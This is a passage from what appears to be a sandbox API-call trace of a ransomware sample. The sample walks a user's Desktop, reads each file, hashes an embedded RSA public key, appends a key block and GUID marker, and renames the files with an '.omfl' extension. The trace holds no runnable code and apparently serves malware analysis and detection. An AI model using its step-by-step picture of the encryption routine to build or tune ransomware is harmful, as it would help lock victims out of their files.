Uuid=0xe00fa48) returned 0x0 [0130.479] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.479] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.479] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.480] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdce0a50 [0130.480] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.480] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x39aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.480] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.481] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.481] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.481] CloseHandle (hObject=0x5c8) returned 1 [0130.484] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.484] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0xdd29950 [0130.485] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\glPN 8bwPmLEByy5eC8l.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\glpn 8bwpmlebyy5ec8l.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\glPN 8bwPmLEByy5eC8l.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\glpn 8bwpmlebyy5ec8l.m4a.omfl")) returned 1 [0130.487] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48527750, ftCreationTime.dwHighDateTime=0x1d5df41, ftLastAccessTime.dwLowDateTime=0x59c7a6c0, ftLastAccessTime.dwHighDateTime=0x1d5e2cc, ftLastWriteTime.dwLowDateTime=0x59c7a6c0, ftLastWriteTime.dwHighDateTime=0x1d5e2cc, nFileSizeHigh=0x0, nFileSizeLow=0xd62e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i6h ljdeCwtArYp.docx", cAlternateFileName="I6HLJD~1.DOC")) returned 1 [0130.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.487] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\i6h ljdeCwtArYp.docx") returned=".docx" [0130.487] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\i6h ljdeCwtArYp.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i6h ljdecwtaryp.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.487] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=54830) returned 1 [0130.487] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.490] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xd608, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.490] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.491] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xd62e, lpOverlapped=0x0) returned 1 [0130.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.492] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.493] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.493] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.493] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.493] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.493] GetLastError () returned 0x0 [0130.493] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.493] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.493] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.493] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.494] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.494] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.495] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xd62e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.495] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.495] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.495] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.495] CloseHandle (hObject=0x5c8) returned 1 [0130.501] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.501] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0130.501] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\i6h ljdeCwtArYp.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i6h ljdecwtaryp.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\i6h ljdeCwtArYp.docx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i6h ljdecwtaryp.docx.omfl")) returned 1 [0130.503] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60f6e7f0, ftCreationTime.dwHighDateTime=0x1d5d951, ftLastAccessTime.dwLowDateTime=0x11062110, ftLastAccessTime.dwHighDateTime=0x1d5e6ae, ftLastWriteTime.dwLowDateTime=0x11062110, ftLastWriteTime.dwHighDateTime=0x1d5e6ae, nFileSizeHigh=0x0, nFileSizeLow=0x14460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IG-g CeobDS.jpg", cAlternateFileName="IG-GCE~1.JPG")) returned 1 [0130.503] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.503] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0130.503] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IG-g CeobDS.jpg") returned=".jpg" [0130.503] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IG-g CeobDS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ig-g ceobds.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.503] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=83040) returned 1 [0130.503] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.506] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x1443a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.506] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.507] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.508] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x14460, lpOverlapped=0x0) returned 1 [0130.508] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.508] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.508] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.508] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.508] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.509] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.509] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.509] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.509] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.510] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.510] GetLastError () returned 0x0 [0130.510] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.510] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.510] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.510] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.510] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.510] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.510] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.510] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.510] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.510] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14460) returned 0xdd2c688 [0130.511] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.511] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2fb0 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16bc0 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ff8 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16bd8 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c08 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c20 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0130.511] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.511] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c08 | out: hHeap=0x4970000) returned 1 [0130.511] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c20 | out: hHeap=0x4970000) returned 1 [0130.511] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.511] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.511] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0130.511] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16c20 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16c08 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.512] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.512] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c20 | out: hHeap=0x4970000) returned 1 [0130.512] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.512] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c08 | out: hHeap=0x4970000) returned 1 [0130.512] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.512] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.512] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.512] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.512] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.512] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.512] GetCurrentThreadId () returned 0x618 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5c50 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.513] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.513] GetCurrentThreadId () returned 0x618 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.513] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.513] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.513] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.513] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.513] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.513] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c08 [0130.513] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.513] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0130.513] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.514] RtlAllocateHeap 